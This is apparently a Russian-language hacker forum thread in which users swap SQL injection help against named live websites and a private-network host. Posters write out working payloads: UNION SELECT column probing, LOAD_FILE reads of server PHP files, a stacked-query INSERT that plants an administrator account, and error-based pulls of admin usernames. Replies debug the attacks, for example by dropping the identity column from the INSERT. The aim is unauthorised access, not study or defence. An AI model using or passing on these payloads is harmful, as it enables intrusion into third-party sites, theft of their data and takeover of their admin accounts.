А вот такой вопрос - при запросе -1+union+select+1,2,3,4,5/* идёт ответ Ouknown column *xxxx*.Можно без поиска таблицы вбивать названия полей, чтобы угадать ?:РР.Ну, тобишь если вбивать поле user, и, если оно есть, высветится оное ? ).
Ershik Проблемы кодировки пробуй: UNHEX:HEX AES_DECRYPT:AES_ENCRYPT cast(строка+as+binary) По идее любое подойдёт
Скажите я могу читать или писать файлы на сервере MYSql 4 ветки: http://192.168.2.100/stats/map.php?id=1+and+substring(version(),1,1)=4 выполняется http://192.168.2.100/stats/map.php?id=1+limit+5+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(version(),"%20",database(),"%20",SESSION_USER()),13,14,15,16,17/* как читать писать в файл зная дирикторию... но к сожелению не знаю права на папки.... и можноли тут изменять таблицу Есть ли что то типа database() но выводящее где база находится я имею ввиду IP.... еще вот такая ситуация : подобрал столбцы 12 столбец выводится как текст: Code: http://192.168.2.100/stats/map.php?id=1+limit+5+union+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/* а вот это выводит без ошибок но там где выводится 12 столбец пусто.... Code: http://192.168.2.100/stats/map.php?id=1+limit+5+union+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,LOAD_FILE('/var/www/html/stats/includes/class_db.php'),13,14,15,16,17/* так же заместо loadfile вставляю CASE+WHEN+(1=1)+THEN+'A'+ELSE+'B'+END работает выводит А привожу дополнительные сведения о SQL: версия sql 4.0.20 Имя юзера gamecs@localhost имя базы ps_stats как я понял из session_user то запросы выполняются под gamecs@localhost жду помощи... +++
Велемир, ты написал полную ересь, причем поправлять тебя смысла нет, т.к. ересь почти во всем твоем посте
Вообщем форум phpBB я знаю акк админа но в админку нельзя поапасть т.к. требует акк и пароль вваести(админские неподходят) можно ли как нибуть зайти в админку? или сделать дамп без входа в админку?
При запросе http://www.countryman.com/store/product.asp?id=1;+insert+into+users(UserID,Admin,UserName,Password)+values(2,1,'tratata','gangsta')-- Выдаёт ошибку: [Microsoft][ODBC SQL Server Driver][SQL Server]Cannot insert explicit value for identity column in table 'USERS' when IDENTITY_INSERT is set to OFF Мне страшно о_О...
IDENTITY_INSERT отключен для UserID т.е. ты не можешь вставлять туда значения вручную, пробуй без нее: http://www.countryman.com/store/product.asp?id=1;+insert+into+users(Admin,U serName,Password)+values(1,'tratata','gangsta')--
http://www.countryman.com/store/product.asp?id=1;+insert+into+users(UserName,Admin,Password)+values('Welka','1','realkilla')-- Чойто не фкурил. Ввёл 2 раза неверно, и уже типо аблом - http://www.countryman.com/admin/ You have exceeded the maximum allowed log in attempts. Тобишь всё должно быть верно о_О,но не пустило
хелп http://kharkov.nezabarom.com.ua/events/Devushki-nebav-samolet!/?page=-1 http://kharkov.nezabarom.com.ua/events/Devushki-nebav-samolet!/?page=7+UNION+SELECT+1,2,3,4,5,6,7,8,9,10/* плин даже выводимы поля получить не могу, наверна юнион запрос скорей всего чото не выполняется, тока почему?
Велемир, это походу не от админки, или мож ты в поле Admin не те данные инзертишь а вот здесь:_http://www.countryman.com/dealers/default.asp нормально авторизовывает Shred, инъекция после limit при наличии order by, ничего не сделаешь
Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'realkilla' to a column of data type bit тут стопудоф надо либо 0,либо 1 ( Взял в той же последовательности, отмочил другой логин и пасс и всё равно не фурычит при запросе(мошь я туплю,но вот) http://www.countryman.com/store/product.asp?id=1+or+1=(select+top+1+UserName+from+users+where+Admin=1)-- Вместо 1 ставлю другие номера ( ну перебираю типо - надеюсь хоть это правильно:Р )
Scipio Объясни плиз, просто я смотрел, показалось ,что вообще скули нет т.е. нет возможности как то влиять на запрос
http://kharkov.nezabarom.com.ua/events/Devushki-nebav-samolet!/?page=7 ну да, можно сказать и нет инъекции, просто я не так выразился, там значение page увеличивается на единицу и умножается на 10, т.е. по идее даже запрос свой не вставишь
